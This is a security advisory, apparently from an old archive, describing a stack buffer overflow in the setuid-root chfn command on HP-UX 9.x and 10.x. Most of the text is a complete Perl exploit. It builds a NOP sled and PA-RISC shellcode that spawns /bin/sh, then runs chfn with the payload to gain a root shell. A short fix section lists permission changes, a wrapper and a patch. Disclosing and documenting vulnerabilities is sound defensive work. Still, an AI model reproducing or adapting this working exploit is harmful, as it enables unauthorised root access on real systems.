COMMAND

    chfn

SYSTEMS AFFECTED

    All platforms running HP-UX 9.x and 10.x

PROBLEM

    Due  to  insufficient  bounds  checking  on  arguments  which  are
    supplied by users, it is possible to overwrite the internal  stack
    space of the chfn program while  it is executing.  By supplying  a
    carefully designed argument to the chfn program, intruders may  be
    able to  force chfn  to execute  arbitrary commands.   As chfn  is
    setuid root, this  may allow intruders  to run arbitrary  commands
    with root privileges.  Thnx SOD for exploit.

#!/usr/bin/perl

use FileHandle;

sub h2cs {
  local($stuff)=@_;
  local($rv);
  while($stuff !~ /^$/) {
    $bob=$stuff;
    $bob =~ s/^(..).*$/$1/;
    $stuff =~ s/^..//;
    $rv.=chr(oct("0x${bob}"));
    }
  return $rv;
  }

open(PIPE,"uname -r|");
chop($rev=<PIPE>);
close(PIPE);
$rev =~ s/^.*\.(.*)\..*$/$1/;

if ($rev eq "10") {
  $offset=2070;
  $prealign="AA";
  $postalign="PPPP";
  $pcoq=h2cs("7b03A013");
  } else {
  $offset=2070;
  $prealign="AA";
  $postalign="PPPP";
  $pcoq=h2cs("7b033013");
  }

$nop=h2cs("08210280");
$code="";
$code.=h2cs("34160506"); # LDI 643,r22
$code.=h2cs("96d60534"); # SUBI 666,r22,r22
$code.=h2cs("20200801"); # LDIL L%0xc0000004,r1
$code.=h2cs("e420e008"); # BLE 4(sr7,r1)
$code.=h2cs("0b5a029a"); # XOR arg0,arg0,arg0
$code.=h2cs("e83f1ffd"); # BL .+8,r1
$code.=h2cs("08210280"); # NOP
$code.=h2cs("34020102"); # LDI 129,rp
$code.=h2cs("08410402"); # SUB r1,rp,rp
$code.=h2cs("60400162"); # STB r0,177(rp)
$code.=h2cs("b45a0154"); # ADDI 170,rp,arg0
$code.=h2cs("0b390299"); # XOR arg0,arg0,arg0
$code.=h2cs("0b180298"); # XOR arg0,arg0,arg0
$code.=h2cs("341604be"); # LDI 607,r22
$code.=h2cs("20200801"); # LDIL L%0xc0000004,r1
$code.=h2cs("e420e008"); # BLE 4(sr7,r1)
$code.=h2cs("96d60534"); # SUB 666,r22,r22
$code.=h2cs("deadcafe"); # Illegal instruction -- dump core if exec fails
$data="/bin/sh."; # Data stuff

$codedata=$code.$data;
$num=int(($offset-length($code)-length($data)-4)/4);
$pre="$nop"x$num;
$of=$prealign;
$of.=$pre.$code.$data.$postalign.$pcoq;
exec("/usr/bin/chfn","$of");

SOLUTION

    Remove setuid and non-root execute permissions,

        # chmod 500 /usr/bin/chfn

    Install chfn wrapper,

        ftp://ftp.auscert.org.au/pub/auscert/tools/overflow_wrapper.c

    Install patch.